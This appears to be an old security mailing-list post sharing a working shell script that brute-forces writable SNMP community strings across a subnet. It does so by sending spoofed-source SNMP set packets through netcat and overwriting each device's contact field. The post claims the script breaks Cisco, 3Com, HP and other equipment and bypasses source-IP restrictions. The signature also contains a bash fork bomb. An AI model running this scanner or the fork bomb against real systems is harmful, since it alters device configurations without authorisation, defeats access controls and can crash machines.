Hmm, to keep you busy, here's brute-force spoofing scanner for writable
snmp communities. Requires NetCat and snmp tools (like snmpget) to be
installed. Scanning is mostly harmless - it tries to change
system.sysContact.0 to 'null' using common default communities (according
to securityfocus). Should be run as root.
In addition to list of machines given in initial post, it is known to
break some Cisco systems (but not recent IOSes, at least not in default
configuration), most of 3com products (there was another writable
community, which seems to be present everywhere, regardless of 'private',
which is disabled by administrators sometimes), HP switches, printers,
Ascend *DSL modems etc. Also, it should bypass most of stupid source IP
address restrictions for accessing the community.
Please use this tool to scan your network only.
_______________________________________________________
Michal Zalewski * [[EMAIL PROTECTED]] <=> [AGS WAN SYSADM]
[dione.ids.pl SYSADM] <-> [http://lcamtuf.na.export.pl]
[+48 22 551 45 93] [+48 603 110 160] bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=
#!/bin/sh
rm -f .walk.tmp* /tmp/spoof-* WYSZLO &>/dev/null
echo "snmpd vulnerability scanner by <[EMAIL PROTECTED]>"
echo
x=$1
PRE=$2
if [ "$2" = "" ]; then
echo "Usage: $0 start_at c_subnet"
echo "example: '$0 0 172.16.1' will scan 172.16.1.0-255."
echo
exit
fi
SPFILE="/tmp/spoof-$$"
cat >$SPFILE.c <<_EOF_
char buf[1000];
char part1[]="0\202\0-\2\1\0\4";
char part2[]="\243\37\2\1\1\2\1\0\2\1\0000\0240\202\0\20\6\10+\6\1\2\1\1\4\0\4\4null";
main(int argc,char**argv) {
char x=strlen(argv[1]);
memcpy(buf,part1,sizeof(part1)-1);
memcpy(buf+sizeof(part1)-1,&x,1);
strcpy(buf+sizeof(part1),argv[1]);
memcpy(buf+sizeof(part1)+x,part2,sizeof(part2)-1);
write(1,buf,x+1+sizeof(part1)+sizeof(part2));
}
_EOF_
echo "Compiling helper application..."
gcc -o $SPFILE $SPFILE.c
test -x $SPFILE || exit
echo "Scan range: $PRE.$x-255..."
if [ "$1" = "0" ]; then
echo "* Collecting routing information (6 seconds)..."
/usr/sbin/traceroute -n -f 3 -w 60 $PRE.32 2>/dev/null >.walk.tmp &
sleep 6
killall traceroute &>/dev/null
awk '{print $2}' .walk.tmp >.walk.tmp2
fi
echo "Starting scan. Outfile is: WYSZLO"
while [ "$x" -lt "256" ]; do
echo $PRE.$x >>.walk.tmp2
let x=x+1
done
COMMUNITIES="public private write all monitor agent manager OrigEquipMfr admin default
password tivoli openview community snmp snmpd system"
for i in `cat .walk.tmp2`; do
echo -n "$i: "
snmpget -R 2 $i public system.sysDescr.0 &>.walk.tmp
ERR="`grep -c -iE 'refuse|error|timeout|fail|denied|found|acce' .walk.tmp`"
if [ "$ERR" = "0" ]; then
echo "OK"
echo -n " system: "
awk -F'"' '{print $2}' .walk.tmp >.walk.tmp2
SYS="`cat .walk.tmp2`"
echo "$SYS"
snmpget -R 2 $i public system.sysDescr.0 &>.walk.tmp
awk -F'"' '{print $2}' .walk.tmp >.walk.tmp2
SYSNAME="`awk '{print $1}' .walk.tmp2`"
echo "$i ($SYS):" >>WYSZLO
for j in $COMMUNITIES 'all private' 'Secret C0de' $SYSNAME; do
echo -n " $j> "
$SPFILE "$j" | nc -u $i 161 &>/dev/null &
$SPFILE "$j" | nc -s 127.0.0.1 -u $i 161 &>/dev/null &
$SPFILE "$j" | nc -s $i -u $i 161 &>/dev/null &
$SPFILE "$j" | nc -s $PRE.1 -u $i 161 &>/dev/null &
sleep 1
killall nc &>/dev/null
snmpget -R 2 $i public system.sysContact.0 &>.walk.tmp
WORKED="`grep -c null .walk.tmp 2>/dev/null`"
if [ "$WORKED" = "0" ]; then
echo " - $j failed." >>WYSZLO
echo "failed."
else
echo "OK"
echo " - $j WORKED." >>WYSZLO
break
fi
done
else
echo "milczy..."
fi
done
echo "Done."
rm -f .walk.tmp* $SPFILE*
